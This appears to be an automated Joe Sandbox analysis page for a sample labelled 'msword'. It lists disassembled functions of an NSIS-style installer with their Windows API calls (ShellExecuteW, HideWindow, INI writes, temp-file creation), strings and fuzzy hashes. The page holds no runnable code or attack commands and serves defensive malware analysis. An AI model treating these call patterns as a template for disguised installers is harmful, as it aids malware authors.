Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
<RM>, xrefs: 00402713
WarsFeltMadridFarmsPee, xrefs: 00402770

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$WarsFeltMadridFarmsPee$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-1220653561
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
